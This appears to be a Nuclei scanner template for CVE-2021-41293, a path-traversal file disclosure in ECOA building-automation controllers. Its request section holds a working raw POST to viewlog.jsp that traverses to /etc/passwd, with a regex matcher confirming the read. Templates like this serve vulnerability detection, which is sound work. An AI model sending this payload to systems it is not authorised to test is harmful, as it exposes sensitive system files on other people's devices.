39 lines
1.1 KiB
YAML
39 lines
1.1 KiB
YAML
id: CVE-2021-41293
|
|
|
|
info:
|
|
name: ECOA Building Automation System - Local File Disclosure
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-41293
|
|
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
|
|
- https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html
|
|
tags: cve,cve2021,ecoa,lfi,disclosure
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.50
|
|
cve-id: CVE-2021-41293
|
|
cwe-id: CWE-22
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /viewlog.jsp HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
yr=2021&mh=6&fname=../../../../../../../../etc/passwd
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/03/07
|